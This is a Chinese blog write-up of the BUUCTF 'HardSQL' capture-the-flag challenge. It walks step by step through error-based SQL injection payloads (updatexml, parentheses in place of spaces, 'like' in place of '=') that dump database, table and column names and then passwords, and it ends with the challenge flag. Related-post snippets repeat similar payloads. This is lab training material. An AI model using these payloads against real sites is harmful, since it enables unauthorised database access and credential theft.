buuctf-HardSQL

最新推荐文章于 2024-04-19 18:32:25 发布
最新推荐文章于 2024-04-19 18:32:25 发布
阅读量1.3k 收藏
点赞数
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62094846/article/details/123917995
版权

 这道题过滤了很多sql注入的关键词(可以用bp,fuzz出来,下次试试) 

包括空格,但是没有过滤报错注入的两个关键词updatexml和extractvalue

用报错注入

查库名(geek)

?username=1'or(updatexml(1,concat(0x7e,(database()),0x7e),1))%23&password=1

 

查找所有数据库 

?username=admin'or(updatexml(1,concat(0x7e,(select(group_concat(schema_name))from(information_schema.schemata)),0x7e),1))%23&password=1

 查表名

=被过滤了,可以用like代替 

?username=admin'or(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where((table_schema)like('geek'))),0x7e),1))%23&password=1

 查列名 

?username=1'or(updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')),0x7e),1))%23&password=1

 查数据

?username=1'or(updatexml(1,concat(0x7e,(select(group_concat(password))from(H4rDsq1)),0x7e),1))%23&password=1

报错有长度限制

用left,right拼接

?username=1'or(updatexml(1,concat(0x7e,(select(group_concat(right(password,30)))from(H4rDsq1)),0x7e),1))%23&password=1

flag{51fcaf4f-56a5-4b5f-8867-d878f4c2ebd7}

m0_62094846
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BUUCTF——[极客大挑战 2019]HardSQL
doraemon12345的博客
06-01 225
打开题目,进行常规注入,发现都行不通,union、空格和and被过滤了,尝试extractvalue()报错注入可行,开始做题,建议做的时候可以先用burp抓包在里面做,在网页上做请先带好痛苦面具(有耐心的当我没说,嘿嘿)。 先爆库名: payload:?username=1&password=123'^extractvalue(1,concat(0x7e,(select(database()))))%23 得到库名爆表名: payload:?username=1&password=12
[BUUCTF刷题]HardSQL
weixin_43952190的博客
07-03 2015
HardSQL 进入后是sql注入页面,过滤了一些字符,先进行fuzz测试。 发现过滤了union,双写也无法绕过,所以不能使用常规的方法进行注入。但发现没有过滤extractvalue和updatexml。 也过滤了空格,使用括号绕过。 首先,注数据库名称 username=admin'or(updatexml(1,concat(0x7e,(SELECT(database())),0x7e),1))%23&password=1 然后得到表名(过滤=,使用like) userna
BUUCTF关于sql注入的题目
最新发布
2302_80935968的博客
04-19 779
测试的时候输入了 1’ and ‘1’='1这个有问题的payload,看报错信息中带有一个 and password=‘1’ and ‘1’=1 说明sql语句是SELECT * FROM tables WHERE username=‘1’ and ‘1’=1 and password=‘1’ and ‘1’=1 类似这样的查询,and 的两边同时为TRUE 结果才能为 TRUE,所以输入的payload一定要符合这个条件就可以登录成功了。(select 输入数据 || flag from Flag)
BUUCTFHardSQL[极客大挑战 2019]
金 帛的博客
06-06 1290
buucft记录贴
BUUCTF WEB HardSql
qq_41696858的博客
10-13 238
这题考的是报错注入 判断注入类型还是跟之前一样的,一个单引号’直接看出来是单引号闭合 下面就是注入方式了,之前的双写,堆叠肯定就不用想了,试试报错,emmm 关于报错注入,可以看这一篇,感觉写的还挺详细的,https://developer.aliyun.com/article/692723 基础payload: 账号:a'^extractvalue(1,concat('~',(select(database()))))#,密码123 成功爆破出来库名geek 空格被过滤了,所以需要空格来绕过 知道注入方
buuctf-[极客大挑战 2019]HardSQL(小宇特详解)
小宇的web博客
01-26 2998
buuctf-[极客大挑战 2019]HardSQL(小宇特详解) 遇到了SQL注入,先尝试一下万能密码,虽然感觉%100不能用 果不其然 双写再试一下发现也不行 这里使用extractvalue和updatexml进行报错注入,空格和=号没有,所以我们要使用()来代替空格,使用like来代替=号 使用extractvalue() /check.php?username=admin&password=admin'^extractvalue(1,concat(0x7e,(select(database
BUUCTF-Web-Mark loves cat变量函数覆盖
02-16
【变量覆盖漏洞详解】 ...这类漏洞通常出现在以下几种情况: 1. **全局变量覆盖**: ...攻击者可以通过操纵这些请求参数来覆盖预定义的变量,造成安全风险。... ...2. **extract()函数使用不当**: `extract()`函数会从数组中...
BUUCTF-MISC-WP(详细解题思路)
01-27
BUUCTF-MISC-WP(详细解题思路)
BUUCTF-PWN-[ZJCTF 2019]Login
07-10
BUUCTF-PWN-[ZJCTF 2019]Login
BUUCTF Reverse CrackRTF-附件资源
03-05
BUUCTF Reverse CrackRTF-附件资源
BUUCTF [极客大挑战 2019]HardSQL
m0_63253040的博客
03-28 2398
还是这个熟悉的登录页面 尝试万能密码登录,发现有过滤,一个一个试 过滤了空格,=,等等许多,双写也无法绕过,那么换报错注入试试
Buuctf:[极客大挑战 2019]HardSQL
fcz___的博客
03-12 272
payload:用户名:1’^(updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1))#密码:1。可以看到,or, by, and union 等都过滤了。好我们先记下这半边,查一下又半边再接上就行了。好家伙,又是他.这次他又有能耐了。我们先试试万能能密码。我们跑个fuzz看看过滤了啥。
Buuctf-[极客大挑战 2019]HardSQL
m0_63563528的博客
04-13 270
的,任何可以计算出结果的语句都可以用括号围起来,而括号的两端,可以没有多余的空格。我们知道,出现这个说明闭合成功了,但是之后发现它过滤了好多字符和语句,我输入。拼接一下flag,把重复部分删咯,就可以成功提交。又得到了:98-8e23-3728c2f96a1d}报错注入回显嘛,直接获取数据库名“geek”空格被过滤了 ,怎样绕过呢?我来试一下:输入1'(or)#
BUUCTF:[极客大挑战 2019]HardSQL
末初的CSDN博客
11-07 586
题目地址:https://buuoj.cn/challenges#[%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98%202019]HardSQL 使用Burpfuzz测试过滤了哪些关键字 过滤了空格、=、substring、mid等字符 Trick 使用()代替空格 使用like代替= 使用right、left代替substring、mid 注入过程如下 1'or(1)like(2)%23 1'or(updatexml('~',concat('~',
BUU-web HardSQL
qq_46635165的博客
10-18 307
知识点: sql显错注入 显错注入:简单来说,就是通过某些函数回显的报错信息来获取我们想要的数据; 例如: mysql的 updatexml() 函数:由于 select user() 查询出的数据不符合 XPATH 语法,从而报错,顺便将 select user() 这条语句执行,并将结果以报错的方式显示出来; 解题: 打开解题网址,账户密码登录框,尝试单引号报错,报错成功; 单引号闭合,并 # 号注释:闭合成功; 接下来尝试 order by 字段猜测,发现 被过滤:并且过滤了 union ,a.
【学习笔记 29】 buu [极客大挑战 2019]HardSQL
weixin_43553654的博客
07-28 158
0x00 知识点 sql报错注入 通过left,right来查询不同内容 0x01 知识点详解 什么是报错注入? 答:其原因主要是因为虚拟表的主键重复。按照MySQL的官方说法,group by要进行两次运算,第一次是拿group by后面的字段值到虚拟表中去对比前,首先获取group by后面的值;第二次是假设group by后面的字段的值在虚拟表中不存在,那就需要把它插入到虚拟表中,这里在插入时会进行第二次运算,由于rand函数存在一定的随机性,所以第二次运算的结果可能与第一次运算的结果不一致,但
buuctf 极客大挑战 hardsql
SopRomeo的博客
01-19 3891
常规sql注入发现成这样了。 然后发现order by 和 union 都不行 报错注入就可以用了 可以使用extractvalue和updatexml进行报错注入 附上视频讲解https://www.bilibili.com/video/av77851975 输入的时候发现了 这题目还过滤了空格和and emmmm 用括号来代替空格就能绕过了 发现还不行 百度了web 的骚操作 用’^'来连接...
buu-web [极客大挑战 2019]HardSQL【报错注入】
weixin_53146913的博客
04-10 304
普通的方式注入都被ban了。那使用报错注入试一下吧。 但其过滤了空格和=号,不过我们可以使用()代替空格,like代替=号,用’^'来连接函数,形成异或。 使用updatexml报错法注入 ()-> ' ' 使用()代替空格 ‘ ^ ’ -> 连接函数 用’^'来连接函数 %23 是 '#' 的URL编码。 0x7e 是 '~' 的ascII码。 一、爆库名: admin 1'^extractvalue...
buuctf-强网杯2019随便注
09-03
buuctf-强网杯2019随便注是一场2019年强网杯举办的CTF比赛中的一道题目。这道题目的名称暗示着它是一个与注入漏洞相关的题目。 注入漏洞是一种网络安全漏洞,攻击者可以通过在用户输入的数据中注入恶意代码来获取...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值